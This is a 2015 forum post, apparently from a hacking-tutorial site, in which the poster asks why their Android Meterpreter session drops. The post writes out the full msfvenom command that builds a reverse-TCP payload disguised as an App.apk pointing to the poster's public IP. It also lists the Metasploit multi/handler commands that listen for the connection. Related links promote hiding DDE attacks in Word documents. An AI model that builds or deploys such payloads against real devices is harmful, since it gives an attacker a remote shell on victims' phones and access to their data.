Problems with MSFVenom on Kali 2.0

Nov 5, 2015 11:39 PM

I seem to be having problems not with creating the payload but with getting the information from the handler after it connects . I've read different responses on what IP address to use so I've tried them all when creating the payload . I've used my Routers Ip public and private my wlan IP and my computers with port 8080 as well as tried 443 . I seem to be able to get a response on the handler when using my public IP ie 66.yada.yada .yada vs using my wlan 172.yada.yada so I'm assuming the public IP is the way to go . Using others I get no response from the handler .

After the payload is opened it shows opened on the handler as well as date and time then closes with after connecting to a 0.0.0.08080 host which I've read is fine as well after the handler connects , it runs and then stops . Below is a copy past of my set up .

This is the payload set up in terminal

msfvenom -p android/meterpreter/reversetcp LHOST=66.yada.yada.yada LPORT=8080 R > App.apk

This is the multi handler set up in metasploit..

msf>use exploit/multi/handler

msf>set payload android/meterpreter/reversetcp

msf>set lhost 66.yada.yada

msf>set lport 8080

msf> set ExitOnSession false

msf>exploit -j

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!